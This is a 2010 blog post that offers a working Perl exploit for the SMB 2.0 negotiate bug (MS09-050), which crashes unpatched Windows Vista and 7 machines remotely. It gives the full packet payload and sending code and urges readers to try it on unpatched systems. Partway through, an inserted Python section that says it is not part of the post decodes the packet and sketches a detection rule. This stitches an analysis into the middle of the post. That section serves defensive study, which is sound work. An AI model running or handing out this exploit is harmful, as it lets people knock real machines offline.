
22 July 2010

WinVista/7 SMB 2.0 BSoD Exploit! - Coded by Phizo

*This is a remote BSoD (denial of service) against the SMB 2.0 implementation in Windows Vista and Windows 7 machines. Microsoft fixed the underlying bug in MS09-050 (CVE-2009-3103), so it only works against machines that have not been patched.*

Today I was talking to my friend gotroot and asked him whether it was possible to convert the Python version of this exploit to Perl, so I ended up doing that with some help from him: he told me about the "use strict;" function and about "my", but the rest of the code I knew already :)

Here is the exploit code:

==============================================================
#!/usr/bin/perl
# Smb-Bsod.pl - SMB 2.0 Negotiate Protocol BSoD (Windows Vista / Windows 7)
# Perl port of Laurent Gaffie's Python proof of concept.

use strict;
use warnings;
use IO::Socket::INET;

my $host = $ARGV[0];
unless ($host) {
    print "#! Usage: Smb-Bsod.pl 127.0.0.1 !#\n\n\a";
    exit 1;
}
my $port = 445;    # SMB over TCP

# One NetBIOS session message carrying an SMB1 Negotiate Protocol request.
# The only non-standard field is Process ID High, which is normally 0x0000;
# the "SMB 2.002" dialect at the end makes the server hand the request to srv2.sys.
my $payload =
    "\x00\x00\x00\x90" .                 # NetBIOS session message, length 0x90 (144 bytes)
    "\xff\x53\x4d\x42" .                 # SMB header: "\xffSMB"
    "\x72\x00\x00\x00" .                 # command 0x72 Negotiate Protocol, NT status 0 ...
    "\x00\x18\x53\xc8" .                 # ... status, flags 0x18, flags2 0xc853
    "\x00\x26" .                         # Process ID High (the trigger; normal value is \x00\x00)
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" .  # signature, reserved, TID 0xffff, PID 0xfeff
    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" .  # UID, MID, WordCount 0, ByteCount 109, dialects:
    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" .  # "PC NETWORK PROGRAM 1.0"
    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" .  # "LANMAN1.0"
    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" .  # "Windows for Workgroups 3.1a"
    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" .
    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" .  # "LM1.2X002"
    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" .  # "LANMAN2.1", "NT LM 0.12"
    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" .  # "SMB 2.002"
    "\x30\x30\x32\x00";

my $sock = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
    Timeout  => 15,
) or die "Could not connect to $host:$port: $@\n\n";

print "Connected to $host:$port.\n";
print "Sending the SMB negotiate request...\n";
sleep(4);
print $sock $payload;
print "Payload sent. An unpatched target should BSoD now.\n\a";
close($sock);

# coded by Phizo
# vulnerability discovered by Laurent Gaffié
==============================================================
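To see what the bytes above actually are, here is an added example that is not part of the post and not Phizo's or Laurent Gaffié's code. It re-encodes the same 148-byte request as a constructed sample, decodes the NetBIOS framing, the SMB header and the Negotiate Protocol body (the list of dialects), and then applies a simple check on captured port 445 traffic: a Negotiate request that offers the "SMB 2.002" dialect with a non-zero Process ID High field is exactly the shape of this proof of concept. The function names (parse_negotiate, set_pid_high, looks_like_ms09_050_probe) are my own and not from any library.

```python
import struct

# Constructed sample input: the same 148-byte request the Perl script sends,
# written as hex (NetBIOS session header + SMB header + Negotiate body).
SAMPLE_REQUEST = bytes.fromhex(
    "00000090"                      # NetBIOS: session message, length 0x90 = 144
    "ff534d42"                      # "\xffSMB"
    "72000000" "001853c8"           # cmd 0x72 (Negotiate), status 0, flags 0x18, flags2 0xc853
    "0026"                          # Process ID High = 0x2600 (normally 0)
    "00000000000000000000fffffffe"  # signature, reserved, TID 0xffff, PID 0xfeff
    "00000000006d00025043204e4554"  # UID, MID, WordCount 0, ByteCount 109, dialects...
    "574f524b2050524f4752414d2031"
    "2e3000024c414e4d414e312e3000"
    "0257696e646f777320666f722057"
    "6f726b67726f75707320332e3161"
    "00024c4d312e325830303200024c"
    "414e4d414e322e3100024e54204c"
    "4d20302e31320002534d4220322e"
    "30303200"
)

NETBIOS_HDR_LEN = 4
# SMB1 header: protocol, command, status, flags, flags2, PID high, signature,
# reserved, TID, PID, UID, MID (little-endian, 32 bytes, no padding).
SMB_HDR = struct.Struct("<4sBIBHH8sHHHHH")
SMB_COM_NEGOTIATE = 0x72
SMB2_DIALECT = "SMB 2.002"


def parse_negotiate(buf: bytes) -> dict:
    """Decode a NetBIOS-framed SMB1 request; raise ValueError if it is malformed."""
    if len(buf) < NETBIOS_HDR_LEN + SMB_HDR.size + 3:
        raise ValueError("too short for NetBIOS + SMB header + parameter block")
    if buf[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    nb_len = int.from_bytes(buf[1:4], "big")
    if nb_len != len(buf) - NETBIOS_HDR_LEN:
        raise ValueError(f"NetBIOS length {nb_len} != {len(buf) - NETBIOS_HDR_LEN} bytes carried")
    (proto, command, status, flags, flags2, pid_high,
     _sig, _reserved, tid, pid, uid, mid) = SMB_HDR.unpack_from(buf, NETBIOS_HDR_LEN)
    if proto != b"\xffSMB":
        raise ValueError("not an SMB1 header")
    body = buf[NETBIOS_HDR_LEN + SMB_HDR.size:]
    word_count = body[0]
    bc_off = 1 + 2 * word_count
    if len(body) < bc_off + 2:
        raise ValueError("truncated parameter block")
    byte_count = struct.unpack_from("<H", body, bc_off)[0]
    data = body[bc_off + 2:]
    if len(data) != byte_count:
        raise ValueError(f"ByteCount {byte_count} != {len(data)} data bytes")
    dialects = []
    if command == SMB_COM_NEGOTIATE:
        # Each dialect entry is 0x02 (buffer format) + ASCII string + NUL.
        pos = 0
        while pos < len(data):
            if data[pos] != 0x02:
                raise ValueError("dialect entry missing 0x02 buffer-format byte")
            end = data.index(b"\x00", pos + 1)
            dialects.append(data[pos + 1:end].decode("ascii"))
            pos = end + 1
    return {
        "command": command, "status": status, "flags": flags, "flags2": flags2,
        "pid_high": pid_high, "tid": tid, "pid": pid, "uid": uid, "mid": mid,
        "word_count": word_count, "byte_count": byte_count, "dialects": dialects,
    }


def set_pid_high(buf: bytes, value: int) -> bytes:
    """Return a copy of the request with the Process ID High header field replaced."""
    off = NETBIOS_HDR_LEN + 12          # proto(4)+cmd(1)+status(4)+flags(1)+flags2(2)
    return buf[:off] + struct.pack("<H", value) + buf[off + 2:]


def looks_like_ms09_050_probe(buf: bytes) -> bool:
    """Hypothetical detection rule: Negotiate offering SMB 2.002 with PID High != 0."""
    try:
        req = parse_negotiate(buf)
    except ValueError:
        return False
    return (req["command"] == SMB_COM_NEGOTIATE
            and req["pid_high"] != 0
            and SMB2_DIALECT in req["dialects"])


if __name__ == "__main__":
    req = parse_negotiate(SAMPLE_REQUEST)
    for key, value in req.items():
        print(f"{key:11} {value!r}")
    print("probe?", looks_like_ms09_050_probe(SAMPLE_REQUEST))
    print("probe after zeroing PID High?",
          looks_like_ms09_050_probe(set_pid_high(SAMPLE_REQUEST, 0)))
```

Run against the sample, the decoder shows a normal-looking SMB1 Negotiate (WordCount 0, ByteCount 109, seven dialects ending in "SMB 2.002") whose only oddity is Process ID High = 0x2600; zeroing that one field turns it into an ordinary negotiate that the check no longer flags.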
This code is user friendly, and you should be able to use this exploit. Do not rip this and call it your own either :) I will know, because this is unique and no one else has created this exploit in Perl.

Enjoy the exploit! (Some systems have patched this, but you can still try; some people don't patch :P)
